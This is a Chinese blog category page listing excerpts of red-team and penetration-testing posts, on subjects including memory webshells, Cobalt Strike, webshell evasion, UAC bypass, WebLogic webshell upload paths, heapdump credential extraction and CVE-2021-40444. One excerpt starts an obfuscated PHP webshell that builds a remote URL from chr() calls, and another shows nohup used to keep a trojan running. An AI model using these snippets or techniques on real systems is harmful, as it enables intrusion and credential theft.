随笔分类 - Web安全

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

摘要：一、概述一文看懂内存马概述：内存马是无文件攻击的一种常用手段，随着攻防演练热度越来越高：攻防双方的博弈，流量分析、EDR等专业安全设备被蓝方广泛使用，传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到，内存马使用越来越多。 Webshell内存马，是在内存中写入恶意后门和木马并阅读全文

posted @ 2022-11-02 16:53 renblog 阅读(1043) 评论(0) 推荐(0) 编辑

dirsearch命令参数

摘要：dirsearch命令组合参考阅读全文

posted @ 2022-05-31 10:03 renblog 阅读(737) 评论(0) 推荐(0) 编辑

红队测试之邮箱打点

摘要：![](https://img2022.cnblogs.com/blog/1395105/202205/1395105-20220505153427478-1463809981.png) 阅读全文

posted @ 2022-05-05 15:31 renblog 阅读(133) 评论(0) 推荐(0) 编辑

邮箱信息收集

摘要：![](https://img2022.cnblogs.com/blog/1395105/202205/1395105-20220505151335089-1775666056.png) 阅读全文

posted @ 2022-05-05 15:14 renblog 阅读(88) 评论(0) 推荐(0) 编辑

Cobalt Strike的多种上线提醒方法

摘要：![](https://img2022.cnblogs.com/blog/1395105/202204/1395105-20220429154704217-1394356222.png) 阅读全文

posted @ 2022-04-29 15:47 renblog 阅读(169) 评论(0) 推荐(0) 编辑

云函数篇---利用云函数搭建简易的代理池

摘要：![](https://img2022.cnblogs.com/blog/1395105/202204/1395105-20220426153603870-1069653782.png) 阅读全文

posted @ 2022-04-26 15:36 renblog 阅读(175) 评论(0) 推荐(0) 编辑

weevely的webshell分析以及冰蝎/蚁剑免杀-PHP版

摘要：![](https://img2022.cnblogs.com/blog/1395105/202204/1395105-20220426111652966-664004422.png) 阅读全文

posted @ 2022-04-26 11:17 renblog 阅读(161) 评论(0) 推荐(0) 编辑

从网络安全工程师到首席安全官——2022最新网络安全推荐书单

摘要：![](https://img2022.cnblogs.com/blog/1395105/202203/1395105-20220323160232866-613850140.png) 阅读全文

posted @ 2022-03-23 16:03 renblog 阅读(288) 评论(2) 推荐(0) 编辑

攻防小技巧——nohup

摘要：说明攻防linux系统运行的🐎会自动掉线，用nohup会在后台运行，关闭终端，nohup运行的程序也不会关闭命令 nohup ./🐎（运行命令） & //除非kill才能关闭进程排查网络连接动态实时监测 netstat -antplc > 1.txt linux查看网络链接状况命令 ne 阅读全文

posted @ 2022-03-23 14:59 renblog 阅读(90) 评论(0) 推荐(0) 编辑

云安全矩阵（腾讯安全）

摘要：![](https://img2022.cnblogs.com/blog/1395105/202203/1395105-20220321144248541-1676041640.png) 阅读全文

posted @ 2022-03-21 14:43 renblog 阅读(98) 评论(0) 推荐(0) 编辑

分享 | BypassUAC技术总结

摘要：UACbypass 阅读全文

posted @ 2022-03-21 10:33 renblog 阅读(63) 评论(0) 推荐(0) 编辑

wx小程序反编译（permeation）

摘要：简介 2022/3/17日更新 PCwx小程序被加密，需要先解包生成.wxapkg pc_wxapkg_decrypt_python python生成路径\WeChatFiles\Applet\小程序id\__APP__.wxapkg python解密工具 python main.py --wxi 阅读全文

posted @ 2022-03-17 10:54 renblog 阅读(576) 评论(0) 推荐(0) 编辑

敏感信息泄露总结——转载

摘要：![](https://img2022.cnblogs.com/blog/1395105/202203/1395105-20220316110301420-118635635.png) 阅读全文

posted @ 2022-03-16 11:04 renblog 阅读(106) 评论(0) 推荐(1) 编辑

企业钓鱼应急演练实现

摘要：背景介绍企业一般为了提升员工的安全意识，一般会进行钓鱼应急演练，简单实现方式如下： 1、钓鱼邮件，制作免杀远控木马，附件中为exe远控木马（有一定风险） 2、钓鱼邮件，制作钓鱼网站，邮件正文存在钓鱼链接（风险可控）本文主要是为了解决cobaltstrike无法直接克隆HTTPS网站，所以用wge 阅读全文

posted @ 2022-02-08 09:51 renblog 阅读(653) 评论(0) 推荐(1) 编辑

MemoryAnalyzer 分析spring boot heapdump提取数据库密码

摘要：springboot heapdump含有数据库账户密码，利用memoryAnalyzer内存分析工具即可提取口令信息，步骤详情如下 MemoryAnalyzer 1、打开heapdump包后点击QQL输入查询语句，点击红色叹号搜索password字段根据springboot泄露的env接口信息，阅读全文

posted @ 2021-12-22 11:17 renblog 阅读(974) 评论(0) 推荐(0) 编辑

weblogic Webshell上传路径

摘要：路径一 /u01/oracle/wlserver/server/lib/consoleapp/webapp/images/shell.jsp http://ip:7001/console/images/shell.jsp 路径二 weblogic网站根目录——及2款exp工具参考连接 weblog 阅读全文

posted @ 2021-10-27 18:13 renblog 阅读(1230) 评论(0) 推荐(0) 编辑

CVE-2021-40444 MSHTML RCE学习

摘要：影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core 阅读全文

posted @ 2021-09-22 14:32 renblog 阅读(233) 评论(0) 推荐(0) 编辑

拉跨大马-webshell—乾坤未定,你我皆黑马

摘要：<?php $password='lshh';$b="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(5 阅读全文

posted @ 2021-09-09 10:33 renblog 阅读(356) 评论(1) 推荐(1) 编辑

关于Swagger-UI下的渗透实战

摘要：关于Swagger-UI下的渗透实战阅读全文

posted @ 2021-08-30 10:44 renblog 阅读(862) 评论(0) 推荐(0) 编辑

公告

昵称： renblog
园龄： 6年10个月
粉丝： 110
关注： 1

+加关注

2025年3月

日

一

二

三

四

五

六

renblog≧▽≦security

随笔分类 - Web安全

公告

搜索

常用链接

最新随笔

积分与排名

随笔分类 (141)

随笔档案 (155)

阅读排行榜

评论排行榜

推荐排行榜

最新评论